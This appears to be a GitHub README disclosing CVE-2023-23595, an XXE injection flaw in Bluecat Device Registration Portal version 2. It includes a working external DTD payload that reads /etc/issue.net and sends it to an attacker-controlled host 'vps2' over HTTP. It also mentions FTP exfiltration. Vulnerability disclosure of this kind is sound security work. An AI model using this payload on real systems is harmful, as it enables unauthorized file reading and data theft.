colemanjp/XXE-Vulnerability-in-Bluecat-Device-Registration-Portal-DRP

XXE Vulnerability in Bluecat Device Registration Portal (DRP) CVE-2023-23595

Summary

Bluecat Device Registration Portal (DRP) version 2 is vulnerable to information leakage via XML External Entity (XXE) injection.

Tested on version 2.2. Version 2 is no longer supported by the vendor.

I was only able to extract single-line files, /etc/issue.net for example. This appears to be a feature of Java 7 and above, per https://web.archive.org/web/20230113185834/https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines

I was also able to exfiltrate single-line files via outbound FTP.

Demonstration

Attacker server vps2 hosts x.xml

<!ENTITY % data SYSTEM "file:///etc/issue.net">
<!ENTITY % param1 "<!ENTITY extract SYSTEM 'http://vps2/?%data;'>">

POST to victim server re

[Screenshot: re_burp.png]

Read content of exfiltrated file /etc/issue.net in web log on attacker server vps2

[Screenshot: re_log.png]

Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23595
